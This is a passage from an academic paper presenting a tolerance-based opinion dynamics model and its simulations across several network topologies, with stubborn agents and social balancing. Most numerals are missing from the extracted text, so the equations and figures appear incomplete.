contagion) versus one-to-many diffusion (complex contagion) (centola & macy, ), and discrete ( or ) versus continuous ( – ) opinion representation. by combining opinion representation and opinion diffusion, we obtain distinct models; they are defined in fig. a and exemplified in figs. b and c. we build our tolerance-based opinion interaction model by using the sd ( ) and sc ( ) opinion representations as defined in fig. a. given a social network g = {v ,e} composed of agents v = { , ,...,n} and edges e, we define the neighborhood of agent i ∈ v as ni = { j | (i,j) ∈ e}. the disjoint sets of stubborn agents v ,v ∈ v (opinion sources), and null agents vnull ∈ v (non-participants with no opinion) never change their opinion, while all other (regular) agents v \ {v ∪ v ∪ vnull} update their opinion based on the opinion of one or all of their direct neighbors. we use xi(t) to represent the real-time opinion of agent i at time t. normal (regular) agents can start with a predefined random opinion value xi( ) ∈ [ , ]. the process of changing the opinion of regular agents is triggered according to a poisson distribution and consists of either adopting the opinion of a randomly chosen direct neighbor, or an averaged opinion of all direct neighbors. we represent with si(t) the discrete opinion of an agent i at moment t having continuous opinion xi(t). in case of the discrete opinion representation sd ( ) (fig. a), xi(t) = si(t); in case of the continuous opinion representation sc ( ) (fig. a), si(t) is given by eq. ( ). si(t) =   if ≤ xi(t) < . none if xi(t) = . if . < xi(t) ≤ . ( ) furthermore, s(t) denotes the average state of the population at a certain time t by averaging the opinion of all individual agents i ∈ v . s(t) = |v |  i∈v si(t). ( ) the previous social interaction models (deffuant et al., ; javarone & squartini, ; li et al., ; chau et al., ; das, gollapudi & munagala, ; fang, zhang & thalmann, ; li et al., ) do not assign nodes (i.e., individuals or social agents) the basic properties of humans, i.e., humans evolve, learn, react, and adapt in time. the reason for the simplicity behind the existing models is twofold: first, the state-of-the-art topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the interaction models, based on the two types of opinion representation and two types of diffusion. (a) taxonomy. (b) opinion representation types where the larger nodes (labeled with s) represent stubborn agents (or opinion sources) which can also have any value for opinion, with the property that their opinion value never changes. discrete opinion (left): nodes have opinion (red) or (green) at any time (sd). continuous opinion (right): nodes have any opinion between and , highlighted by the color gradient transitioning from red to green (sc). (c) a scenario highlighting the two opinion diffusion models for discrete representation. single diffusion (left): the central white node picks one random neighbor and adopts his opinion (sd). complex diffusion (right): the white node polls all neighbors for their opinion and then adopts an averaged opinion (cd). note that only direct neighbors can influence opinion, not friends of friends etc. (e.g., the gray node). topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. models are only suited for theoretical contexts so bringing additional complexity to the interaction model would significantly increase the difficulty of mathematical analysis; second, involving measures of human personality (e.g., quantifying an individuals trust, credibility, or emotional state) is a complicated endeavor, in general; this was not the main goal of previous work. individual tolerance: interpretation and formalism in order to improve the existing opinion interaction model based on a fixed threshold, we consider the evolution of personal traits by taking inspiration from social psychology. as a new contribution to the state-of-the-art, we introduce the concept of tolerance which reflects the individual’s inner state and personal beliefs regarding surrounding opinions. for instance, egocentrism, as it is called in psychology, is highly correlated with individual’s emotional state (elkind, ). we choose to extend this model because the egocentrism-emotional state correlation is a trait that has been shown to influence and evolve with individual opinion (windschitl et al., ). corroborating literature on attitude certainty (clarkson et al., ), consensus (clarkson et al., ), confirmation bias (nyhan & reifler, ), social group influ- ence (roccas & amit, ), and ingroup emotion (moons et al., ), we extrapolate the mechanism that leads to the formation of opinion into a measurable parameter. as such, we define tolerance θ as a parameter that reflects the willingness of an agent to accept new opinions. similar to real life, individuals with higher tolerance will accept the others opinion easier; thus, this parameter can be defined as a real number ≤ θ ≤ . an agent with a tolerance value of is called fully tolerant, whereas an agent with a tolerance of is called fully intolerant (i.e., stubborn agent). tolerance values which are greater than . describe a tolerance-inclined agent, while values smaller than . describe an intolerance-inclined agent. similar to the threshold-based continuous opinion fluctuation model described by acemoglu et al. ( ), tolerance can be used as a trust factor for an agent relationship; however, as opposed to the trust factor, tolerance changes its value over time: xi(t) =   if i ∈ v if i ∈ v . if i ∈ vnull θi(t)xj(t) + ( − θi(t)) xi(t − ) if j ∈ ni for t > ( ) where the new opinion xi(t) is a weighted sum of the agent’s prior opinion xi(t − ) and the current opinion xj(t) of one randomly selected direct neighbor. the weights for the two opinions are given by the current tolerance θi(t) of the agent, thus, the extent of how much it can be influenced depends on its internal state. as can be inferred from eq. ( ), the greater the tolerance of an agent, the easier it can accept external opinions from others. at the beginning of the opinion formation process (t = ), all agents are considered as having a high tolerance (θi( ) = ), but, as the society evolves, agents become intolerant, therefore segregated in clusters which tend to have topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a more stable opinion. we further define the tolerance θ of the entire population as a normalized average of all individual tolerances: θ (t) = |v |  i∈v θi(t). ( ) we also introduce the concept of opinion change ω as the ratio of agents which have changed their current state (discrete time step t) since the last observation (time t − ): ω(t) = |v |  i∈v |si(t) − si(t − )|. ( ) if an agent changes its state from one opinion to another, then the absolute difference |si(t) − si(t − )| will be ; conversely, it will be if the agent state does not change. this change, averaged over all agents at the interaction (discrete) moment t, defines the opinion change of the population ω(t). this metric is used to draw insights regarding the current tolerance level across the entire society. progressive tolerance model our model for tolerance evolution stems from the idea that the evolution towards both tolerance and intolerance varies exponentially (hegselmann & krause, ; weidlich, ), e.g., a person under constant influence becomes convinced at an increased rate over time. if that person faces an opposing opinion, it will eventually start to progressively build confidence in that other opinion. thus, our proposed progressive model represents the tolerance fluctuation as a non-linear function, unlike other models in literature. for the first time, we integrate these socio-psychological characteristics in the dynamical opinion interaction model; as such, the new tolerance state is obtained as: θi(t) =  max(θi(t − ) − α ε , ) if si(t − ) = sj(t) min(θi(t − ) + α ε , ) otherwise. ( ) in eq. ( ), tolerance decreases by a factor of α ε if the state of the agent before interaction, si(t − ), is the same as the state of the interacting neighbor (randomly chosen from all direct neighbors) sj(t). if the states are not identical, i.e., the agent comes in contact with an opposite opinion, then the tolerance will increase by a factor of α ε . variable t represents the time step where an opinion update is triggered; these moments are considered as being randomly distributed. the two scaling factors, α and α , both initially set as , act as weights (i.e., counters) which are increased to account for every event in which the initiating agent keeps its old opinion (i.e., tolerance decreasing), or changes its old opinion (i.e., tolerance increasing). therefore, we have: α =  α + if si(t − ) = si(t) otherwise ( ) α =  if si(t − ) = si(t) α + otherwise. ( ) topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the tolerance function as defined by the progressive tolerance model. (a) tolerance scaling: shows how tolerance θ increases with the α ε scaling, as a result of continuous opinion change for an agent i. (b) intolerance scaling: shows how tolerance θ drops with the α ε scaling, from an initial tolerance θi( ) = to complete intolerance (θi(t) = ). on even terms with the observation of the majority illusion (lerman, yan & wu, ), which explains that globally rare opinions and bias may be strongly present in local neighborhoods as a result of the topology of social networks, we dynamically model bias using the two scaling factors α and α . whenever an event occurs, the counter corresponding to the other type of event is reset. these factors are used to increase the magnitude of the two tolerance modification ratios ε (intolerance modifier weight) and ε (tolerance modifier weight). the two ratios are chosen with the fixed values of ε = . and ε = . . to determine these values, we have tried various ε :ε ratios as follows: if ε is increased such that ε :ε = : , most nodes will quickly become intolerant, as opinion will cease to diffuse; conversely, if ε is decreased closer to a : ratio, then the society will become tolerance-inclined, with random opinion fluctuations. the used ε :ε ratio of : was chosen through consistent experimentation in order to provide a good balance between the deviations towards tolerance and intolerance, respectively. as an illustration of the : ratio for ε :ε , fig. represents the non-linear tolerance function as implemented in eq. ( ). the displayed examples show that a total of consecutive steps are required to maximize the tolerance if an agent starts with θi( ) = . , because the cumulative sum of θi( ) + ε  j α reaches after iterations. similarly, in fig. b, the sum θi( ) − ε  j α requires t = iterations to reach intolerance (θi(t) = ), having started from θi( ) = . model validation our dynamical opinion model adds significant complexity to the opinion interaction model. therefore, we use discrete event simulation (socialsim (topirceanu & udrescu, )) over complex social network topologies, in order to validate our model’s capability to reproduce real-world phenomena like the opinion formation phases and the phase transition towards social balancing. an important aspect is that our model is based solely on the simple sd/sc contagion principles. we have also implemented a complex contagion model in socialsim, and topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. performed extensive simulations to compare it against our simple contagion results and we have found that when using complex contagion, the dynamics of the society is accelerated and the i, f phases occur very fast, the t phase is omitted, and the society enters the intolerance phase. this is due to the fact that averaging the opinion of neighbors does not allow a node to be in contact with the likely divergent opinions of his neighbors, one by one, and thus tolerance cannot increase. as a consequence, nodes tolerance θ will decrease after each interaction. conceptually, we have defined the tolerance model to keep nodes tolerant through individual interactions which present diversity in opinion, like we would have in real life. even if humans usually evolve towards the average opinion of their social group, they do so through sequences of individual interactions, as our model tries to capture. simulation on basic topologies regular networks the first simulation setup is based on regular topologies, i.e., lattice and mesh. the results show that a homogeneous cluster of stubborn agents divides the overall society opinion (i.e., green ( ) vs. red ( )) with a ratio that is directly proportional with their initial distribution. figure is used as an exemplification of the four phases, as obtained in socialsim, and shows how a mesh network of , agents (generated by placing nodes uniformly in a , by , unit space and connecting them within a radius of with link probability p = . ) evolves under the influence of stubborn agents— of each opinion evenly distributed among the population. this way, we observe the same opinion formation phases as identified by our empirical observations: initiation i (fig. a), fusion f (fig. b), tolerance t (fig. c), and intolerance t (fig. d). the situation in fig. c may lead to one of two scenarios: a perpetual (proportional) balance of the two opinions, introduced by us as social balancing (the society remains in the t phase, and t is never reached), or a constant decrease in opinion dynamics which ultimately leads to a stop in opinion change (the society reaches the t phase), as depicted in fig. d. figure provides illustrative, single experiment results, which intend to capture the specific behavior of opinion evolution. again, the same patterns were observed throughout all our multiple simulations. figure a illustrates a society which tends towards the tolerance phase t and social balance, by providing the evolution of the overall society state s(t) (as defined in eq. ( )), tolerance θ (t) (see eq. ( )), and opinion change ω(t) (eq. ( )). for the society described in fig. a, the initiation phase i is revealed by the early increase of ω(t), as the number of individuals with opinion increases. the climax of ω(t) represents the fusion phase f. at this stage, there is a maximum number of bordering agents with distinct opinions (a situation that is also depicted in fig. b) and s(t) evens out. in the tolerance phase t, the agents tend to stabilize their opinion, i.e., θ (t) stabilizes and s(t) converges towards the ratio of stubborn agents (which was chosen as : ). another observation is that opinion fluctuation is determined by the stubborn agents density (see fig. b, c and d). because of the regular topology, the fewer stubborn agents (regardless of their opinions) there exist in the society, the more the opinion topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure green ( ) vs. red ( ) opinion evolution with homogeneous stubborn agent distribution in a , node social network. the network is initialized with red and green stubborn agents (represented as the darker nodes) which start influencing the neighboring regular agents. initially, the regular agents have no opinion and are colored with grey. we distinguish between the following phases of opinion formation: (a) the initiation phase i where the society has no opinion, i.e., the stubborn agents exercise their influence to the surrounding neighborhood without being affected by any other opinion. the opinion change ω(t) rises during this phase, whereas tolerance θ (t) remains high. (b) the fusion phase f where the society is now mostly polarized (green or red) and different opinion clusters expand and collapse throughout the society. the opinion change ω(t) reaches a maximum, and tolerance θ (t) begins to slowly decrease. (c) tolerance phase t, where the cluster interaction stabilizes and new, larger, more stable clusters emerge. most of the individuals within the society have been in contact with both opinions; each agent’s opinion si(t) begins to converge, and the tolerance θ (t) is steadily declining or becomes stable. (d) intolerance phase t, where the overall tolerance of agents has decreased to a point where opinion fluctuation ceases and the red opinion becomes dominant (θ (t) < . ). the society may or may not reach this phase. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation of a , mesh network with socialsim (topirceanu & udrescu, ), display- ing a representative example for the evolution of s(t), θ (t), and ω(t), as well as the opinion evolution s(t) with various stubborn agents distributions. (a) representative setup for the mesh topology, where the lowest panel displays the opinion change (ω) evolution over three simulation phases: (i) initiation, (f) fusion, and (t) tolerance. the opinion state (s) and its tolerance (θ ) are also displayed in the middle and upper panels. (b) opinion evolution s(t) with few and evenly distributed stubborn agents sa ( : ratio: green, red). (c) opinion evolution with many and evenly distributed stubborn agents ( : ratio: green, red), (d) opinion evolution with few and unevenly distributed stubborn agents ( : ratio: green, red). fluctuates. this is explained by the fact that having few stubborn agents means few points of opinion control and stabilization in the local mesh structure; conversely, many stubborn agents make possible the control of more regular agents. because of this, s(t) may drastically get biased in someone’s favor until the entire society stabilizes (fig. b). also, due to the small influencing power of a few agents, the opinion will not necessarily stabilize with the same distribution ratio. as expected, the opinion distribution of a society with a high opinion source concentration will tend towards the ratio of the two stubborn agent populations (fig. c). if the ratio of the two stubborn agent populations is not : , then the opinion fluctuation will be around that ratio only during the initiation phase i. afterwards, the overall opinion will get more biased towards the opinion of the larger stubborn agent population. in fig. d the ratio is : between green and red stubborn agents, therefore the fluctuation starts around % green opinions, but eventually stabilizes at %. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure (a) representative simulations depicting opinion evolution in networks with uniformly dis- tributed stubborn agents for both competing opinions. (a) an uncorrelated random scale-free network in which opinion constantly oscillates, society becomes balanced and stabilizes in the tolerance phase (t) after going through the initiation (i) and fusion (f) phases. (b) an erdos–renyi network in which opinion change is maintained high and opinion presents high oscillations, but the overall state s of the society becomes stable and predictable around % (i.e., as expected for a balanced ratio of sas). the scenarios presented above hold true for lattices. consequently, these conclusions are more of theoretical interest, as real social networks are typically not organized as such regular topologies. next, we consider more realistic network topologies. random networks in order to generate random topologies, we have implemented both erdos–renyi networks (erdös & rényi, ) (see fig. a), as well as uncorrelated networks with preferential attachment (uncorrelated scale-free) as defined by (catanzaro, boguna & pastor-satorras, ) (see fig. b). we create networks of , nodes with the erdos–renyi algorithm (erdös & rényi, ) with wiring probability p = − , and the algorithm described in catanzaro, boguna & pastor-satorras ( ) with , nodes with power-law distributed node degrees within the range – . we use an exponent of γ = − . , which is within the power-law interval − < γ < − . because of the random nature of this second topology, the results obtained with socialsim are much closer to what we obtain for random networks. figure represents the opinion formation phases. due to the disassortative connectivity, opinion dynamics leads to an evolution towards social balance. the explanation for this balancing is due to the the fact that nodes may be connected to any random hubs, so neighboring nodes will not adhere to the same community influenced by the exact same hubs. this diversity in connections keeps tolerance high, so that opinion is kept in balance. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. small-world networks by constructing watts–strogatz small-world networks of , nodes (watts & strogatz, ; strogatz, ; wang & chen, ; tsvetovat & carley, ; chen, zhang & huang, ; bandyopadhyay et al., ), we show experimentally that a different type of behavior can emerge. specifically, we used multiple simulation settings with rewiring probabilities p = . , p = . and p = . respectively, and keep the results for p = . as being the most representative, because the clustering coefficient remains high (i.e., . ). as such, figs. a and b present the society as having a mixed opinions distribution with clusters forming around stubborn agents. similar to the representation in fig. , this topology allows multiple agents to cluster around the stubborn agents and converge towards their opinion. a higher rewiring parameter p is associated with a more random topology which is found to increase tolerance and dissolve agent clusters around opinion sources. consequently, this model not only increases the dynamics of opinion fluctuation, but also keeps the society in social balance. the fourth and final phase of opinion evolution—the intolerance phase—does not occur, and opinion change ω(t) is maintained at a (high) constant level. moreover, the state of the society s(t) is stable. the society depicted in fig. a is homogeneously mixed from an opinion standpoint. clusters do not form because many agents have long range links to other distant agents whose opinion can be different from the local one. this leads to a perpetual fluctuation which remains in balance. the noticeable effect on a small-world network is that the opinion stabilizes very fast and always at the ratio of the two stubborn agent populations (i.e., : in our case). in a mesh network, having few stubborn agents leads to an imbalance of opinion, but in the case of small-world topologies, opinion across the entire population always stabilizes. opinion change ω(t) is also much higher compared to the mesh (i.e., % versus % under the same conditions) due to the long range links. networks with preferential attachment we apply the same methodology by constructing a , node barabasi–albert (ba) network with preferential attachment and highlight the unique behavior it enacts (barabási & albert, ; pastor-satorras & vespignani, ; albert & barabási, ; wang & chen, ; song, havlin & makse, ; chen, zhang & huang, ). as fig. c shows, the society does not reach a balance at the expected value ( : ⇒ %); instead, it gets biased towards one opinion or another. the reason behind this behavior is related to the power-law degree distribution (wang & chen, ). as such, ba scale-free networks behave more like a tree-structure with hubs rather than as a uniform graph. indeed, as opinion flows from one agent to another, the higher impact of the hub nodes on the opinion formation at the society level becomes clear. if, for example, a green stubborn agent is placed as the root of a sub-tree filled with red stubborn agents, that sub-tree will never propagate red opinion as it cannot pass through the root and connect with other nodes. experimentally, this is illustrated in fig. c. the green agents have been placed over nodes with higher degrees, and this can be seen in the evolution of the opinion. there is some initial fluctuation in the society and although the stubborn agent distribution is even, the fluctuation rapidly imbalances as the overall tolerance θ (t) plummets and all topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure opinion evolution with homogeneous stubborn agent distribution ( : ) in small-world and ba networks. (a) tolerance phase where visible clusters emerge for small-world networks. (b) for small-world networks, social balancing is attained because tolerance remains extremely high (θ (t) > %), opinion change (ω) exhibits the three opinion evolution phases (initiation i, fusion f, and tolerance t), and never reaches intolerance. the state of the society s(t) is stable. (c) social balancing is not achieved for ba networks: tolerance drops constantly and the society reaches the intolerance phase (t). the state of the society s(t) is unstable during the first three phases of opinion change, then stabilizes as tolerance (θ ) and opinion change (ω) fall. agents become sort of “indoctrinated” by the green opinion. the rapid drop in tolerance coincides with the drop in opinion change ω(t) and the stabilization of the state s(t) at over %. simulations were also run on the wsdd topology (chen, zhang & huang, ), which has a strong preferential attachment component, and yield similar results which lead to the same set of observations. we generated the wsdd topology based on topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation results on a small-world network with red and green stubborn agents for the: (a) fully random interaction model: there are no opinion formation phases, the society is balanced all the time and the opinion has almost no oscillations; (b) random-tolerance interaction model: there are no clear opinion formation phases, the society is balanced all the time, while the opinion has oscillations. communities, each with , nodes. the nodes are connected with k = neighbors on each side and a rewiring probability p = . . validation hypotheses in order to strengthen the idea of social balancing, which is observed in our experimental data, we propose to validate the tolerance model against a null/random model. this is addressed by the implementation of random interacting agents in our simulation tool, followed by a replication of the experiments, and a final conclusion. we have added randomness in two ways: • fully-random interaction model: all agents have random tolerance values, random initial opinions, interact with random neighbors who posses random opinions, and tolerance is updated randomly after each interaction. looking at the simulation results with random interaction model, we obtain the same output regardless of topology and sa concentration. • random-tolerance interaction model: similar with our proposed opinion interaction model, but here each agent receives a static tolerance initialized with a random value in the [ , ] interval at startup. figure depicts a small-world with green and red stubborn agents. the state of the society remains balanced at % and there are no visible opinion formation phases. with the random-tolerance interaction model, the state of the society oscillates much more in comparison with the fully random model, but less when compared with our proposed tolerance interaction model. as for the fully-random model, the opinion formation topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. phases are not clear. we can only conclude that using a random/null model for validation shows that tolerance actually plays an important role in the statistical results obtained in our paper. in real-world social networks there are agents which do not hold any opinion, and they simply do not participate the diffusion process. we have covered this scenario in eq. ( ) as an agent which has opinion x(t) = . will carry the state none. these agents are called null agents (na) and do not take part in the opinion interaction. theoretically, we consider that nas should act like edge-disconnections in the graph. by adding nas in socialsim, we were able to test them with all our synthetic topologies. the higher the population of randomly distributed nas, the fuzzier the four phases become. initiation (i) is less steeper, fusion (f) isn’t that spiky anymore, tolerance (t) is achieved harder/later as the state oscillates more, but the society is still in balance and predictable; opinion change stabilizes with some delay. the phases tend to dissolve after a concentration of approximately % population of null agents. additional simulations have been run with nas and all obtained results lead to the same observations as those presented in figs. a– f. all tests from fig. were run on small-worlds with , nodes. in reference acemoglu et al. ( ) the authors try to solve the equations that describe the stationarity of opinion evolution by using random walks from regular agents to stubborn agents which influence their state. even if their model is simpler than the model proposed in our paper, they have to come up with some simplifying assumptions in terms of network topology (only regular topologies are tractable) and number of agents (they solve equations on small networks and then generalize the results in a qualitative discussion). because our paper adds significant complexity to the model (i.e., node tolerance is not a fixed threshold, but a dynamic one which depends on the interactions with neighbors), solving the stationarity equations would require even stronger simplifying assumptions. this is the reason for using simulation in order to analyze the stationarity distribution. nonetheless, in all simulation scenarios, the obtained stationarity described in the paper coincides with one of two (mutually exclusive) cases: • the society reaches intolerance as overall tolerance converges towards (i.e., θ (t) ≃ for t → ∞). when this happens, no further modifications to the state of the society can be achieved. we obtain this behavior on mesh and ba topologies. meshes imply only local connectivity to neighbors that converge towards a similar state, thus tolerance is bound to decrease to (see fig. a). ba networks imply connections to hub nodes, which means that all neighbors are influenced by the same local hubs, which in turn decreases tolerance to (see fig. c). such a situation, in the case of regular small networks, was already mathematically described by acemoglu et al. ( ). the authors measure the probability of being influenced by a sa using random walks. in our case, eq. ( ) can be simplified, for the majority of nodes with θi(t) ≃ , to: xi(t) = xi(t − ), so the state of the society becomes stable. • the society remains in social balance, as the overall tolerance converges towards a non-zero constant in time (i.e., θ (t) > for t → ∞), which causes the state and opinion topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation results for the tolerance-based opinion interaction on a small-world network with , nodes, of which are green sas and red sas. the social network consists of (a) % null agents, (b) % null agents, (c) % null agents, (d) % null agents. change to also stabilize (for t → ∞). we obtain this phenomenon on random and small-world topologies. small-worlds have the unique feature of being both regular and random in a proportion p, given by the rewiring parameter of the watts–strogatz algorithm. thus, nodes interact with equal probability (for p = . , as used in our experiments) with neighbors with similar opinion, and with distant random nodes with different opinion. a proportional value p = . will keep tolerance at maximal value as can be seen in fig. b. due to the random distribution of initial opinion and links (in random networks and small-worlds with p = . ), nodes will oscillate ergodically, and both eqs. ( ) and ( ) will be activated with relatively equal probability. this keeps the tolerance variation of each node around a certain convergence value: θi(t) = θi(t − ) ± α / ε / , where both α ε = and α ε = imply small variation in θi(t). in such a case, for a relatively stable tolerance, the stationarity can also be described as in acemoglu et al. ( ) (where θ is assumed as fixed). topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. phase transition in opinion dynamics this section aims at analyzing the impact of topology, network size, interaction model, stubborn agent placement, ratio and concentration on the opinion change (ω), and on convergence towards intolerance (θ ). simulations show that, in a society with a fixed stubborn agent distribution, the topology τ determines if: • the society enters the intolerance phase i: θ → (with θ < . ), which also results in ω → ; • the society balances and never enters the intolerance phase i: θ → θlimit, where θlimit > . and maintains a high ω; • the society continues to oscillate for . < θ < , but the tolerance level does not stabilize. in case of the yelp dataset, we notice that for a given topology τ , and a network of size n , when the concentration of stubborn agents is bigger than a critical ratio σ , the society never becomes intolerant. in such cases, the society becomes balanced, with slight oscillation in tolerance or opinion change. the goal is therefore to find the tuples (τ , n , σ ) at which this phenomenon occurs. to obtain our results we have used five topologies τ (mesh, random, small-world, ba and wsdd), network sizes n of up to , nodes, our new tolerance interaction model, a ratio of : between green ( ) and red ( ) stubborn agents, and an increasing concentration of stubborn agents ranging from % to %. impact of topology the tolerance and opinion change with respect to the number of stubborn agents, as depicted in figs. a and b highlight a clear difference between the five topologies, namely mesh, random, small-world, ba, and wsdd. there is a total of three clearly distinguishable behaviors: a responsive behavior (present in small-worlds and random graphs), a linear behavior (for mesh networks), and a saturated behavior (corresponding to ba and wsdd networks). the tolerance increases linearly for the mesh, as the population of stubborn agents increases. consequently, there is no critical σ for which a phase transition occurs due to the high regularity of the network, but there is a visible saturation point (when the blue graph begins to drop in fig. a). this happens because the society is physically filled with more stubborn agents than regular ones and because all stubborn agents have θ = , the overall tolerance begins to drop. the responsive behavior exhibited by the random network and small-world networks suggests that these two topologies behave similarly in the context of opinion source saturation. the two topologies are almost identical under the conditions defined here, as they behave almost as the opposite of mesh networks: once the critical point σ is reached, their tolerance rises to the maximum value. then, as the stubborn agents population increases, the tolerance and opinion change values decrease proportionally. the random topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure tolerance (θ ) and opinion change (ω) evolution with the increasing concentration of evenly distributed stubborn agents (sa) and increasing network sizes. values over the five topologies for an increasing concentration of evenly distributed stubborn agents. (a) and (b) θ and ω respective values, over the five topologies when the size of the network is fixed as n = , , and the concentration of stubborn agents ranges from % to %. (d), (d), (e), and (f) tolerance θ stabilization values at which social balancing occurs over increasing network sizes (n = – , nodes) on mesh, small-world, ba, and wsdd networks, respectively. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and small-world topologies are equivalent with the mesh topology as the society becomes saturated with stubborn agents (i.e., see figs. a and b in terms of tolerance θ and opinion change ω, respectively). finally, the saturated behavior groups together the ba and wsdd topologies, both of which have the feature of degree-driven preferential attachment. the two topologies show smaller responsiveness to social balancing. as depicted in figs. a and b, the critical point of stubborn agents concentration for ba is by far the greatest one (i.e., σ = %) and the maximum tolerance θ reached is the smallest among the simulations aiming at the impact of topology ( %). the wsdd topology shows a better response, at a much lower critical stubborn agents concentration point (σ = %) and reaches social balance at θ = %. impact of network size when analyzing the opinion change at society level, the same observations and classifi- cation are valid for all other network sizes. the larger the size n is, the more accurate the delimitation shown in figs. a and b becomes. the impact of size offers a comparison of different tolerance stabilization on the same topology. the results in figs. c– f show how well the social balancing effect scales with increasing sizes of the network. the behavior of meshes, presented in fig. c, shows a linearly proportional increase of the critical stubborn agents concentration σ (around – %) in accordance with the network size n . a similar evolution is visible in fig. f, on networks with preferential attachment, where the required σ is also proportionally bigger on larger networks. in figs. d and e, the random and small-world networks exhibit similar behavioral patterns: they achieve the critical point σ with maximal opinion change, and then evolve towards intolerance at a pace that is corroborated with n (i.e., a slower drop in tolerance for larger networks occurs). the results presented in fig. contains averages stemming from multiple experiments run in socialsim, then processed separately in microsoft excel. in figs. c– f, the points on the ox axis are fixed sa concentrations which are used throughout these exper- iments, and the values on the oy axis are averages obtained from multiple runs (i.e., ). an individual graph from one sub-figure is based on (different sa concentrations) × experiments = simulations. one subfigure is the result of × = simulations, therefore fig. is based on × = simulations. all simulations presented in this section confirm our main observations (twitter, memetracker, yelp) on opinion formation phases and phase transition towards social balancing. discussion the results for the proposed tolerance-based opinion interaction model show that, if indi- vidual traits are considered for modeling social agents, then we can realistically reproduce real-world dynamical features of opinion formation such as opinion formation phases, as well as their evolution towards social balancing. at the same time, we demonstrate that the dynamics of opinion formation is influenced by topology, network size and stubborn agent topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (opinion source) distribution across the entire population. overall, the topology seems to have the strongest influence on opinion formation and spread; this can be summarized by the following different tendencies: • responsive behavior: tolerance stabilization is attained right after reaching a relatively low critical ratio of stubborn agents. inserting additional stubborn agents entail a drop in autonomy and opinion flow. such a behavior is achieved by random and small-world topologies, and it can be motivated by the uniform degree distribution and the existence of both local and long-range links, which foster opinion diversity and social balancing; this can be representative for a decentralized and democratic society. • linear behavior: the critical threshold at which tolerance becomes stable for mesh topologies increases linearly with the stubborn agents concentration. the mesh topology corresponds to a limited, almost “autistic” social interaction behavior (where each agent only interacts with close proximity neighbors); therefore, the probability of opinion diversity only increases with the proportional addition of stubborn agents. for meshes, social balancing is attained only if a substantial number of stubborn agents is inserted. • saturated behavior: tolerance converges slowly around a specific low value. this behavior is achieved in ba and wsdd networks. due to the nature of these topologies, even though long-range links exist, nodes tend to be preferentially attached to the same hub nodes, meaning the same opinion sources. the amount of stubborn agents required to reach social balance is much higher and the resulting balance saturates quickly. it is thus a conservative, stratified and oligarchic type of society which reacts later and slower to new stimuli. most individuals within this type of society remain intolerant and opinion change is treated as suspicious and non-credible. besides these original contributions, the results obtained with our model confirm prior studies which show how individuals converge towards the state of their ingroup (moons et al., ; van der schalk et al., ). this is especially noticeable on networks with high modularity, like the wsdd network in which every member in a community converges towards the community’s dominant opinion, yet every community converges towards a different state. an important real-world aspect of our new tolerance model (which assumes that the level of acceptance of neighboring opinions evolves over time) is that the tolerance level of an agent θi(t) is proportional to the degree of the node. in other words, the more neighbors a node has, the more likely it is to receive different influences which can guarantee a higher tolerance level. this observation is backed up by a recent study which proves that individuals with a higher (in)degree are less likely to be influenced, and the influence of friends is not significantly moderated by their friends’ indegree and friendship reciprocity (geven, weesie & van tubergen, ). the results rendered with our tolerance model also fall in line with a research direction started by gross & blasius ( ) where the authors show that there is a self-organization in all adaptive networks, including multi-agent opinion networks. our real-world topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. observations and opinion simulation results show a similar topological self-organization based on stubborn agent topological properties. finally, the study of opinion dynamics through our proposed concept of social balancing shows key features that may be used in practical applications, like marketing or conflict resolution. under the requirement of keeping the social state stable, while never reaching intolerance, we provide a classification of network topologies based on the social balancing property. networks with the democratic small-world structure promote balancing; the phenomenon is also exhibited if there is a high concentration of stubborn agents to stabilize opinion in mesh networks. if there are significantly fewer stubborn agents in the network, balancing will only be achieved if one side is using a placement strategy to counter its rivals (gionis, terzi & tsaparas, ). a small-world network will not offer an advantage to any of the opinions due the link layout and uniform degree distribution. on the other hand, the oligarchic scale-free topology shows a clear importance of strategically placed agents in hub nodes which intrinsically render the opposing nodes on lower levels of the tree virtually powerless. the balancing phenomenon does not occur in networks with scale-free properties. clearly, the social balancing concept remains open for further debate, improvement, and real-world validation. additional information and declarations funding the authors received no funding for this work. competing interests radu marculescu is an academic editor for peerj computer science. author contributions • alexandru topirceanu and mihai udrescu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. 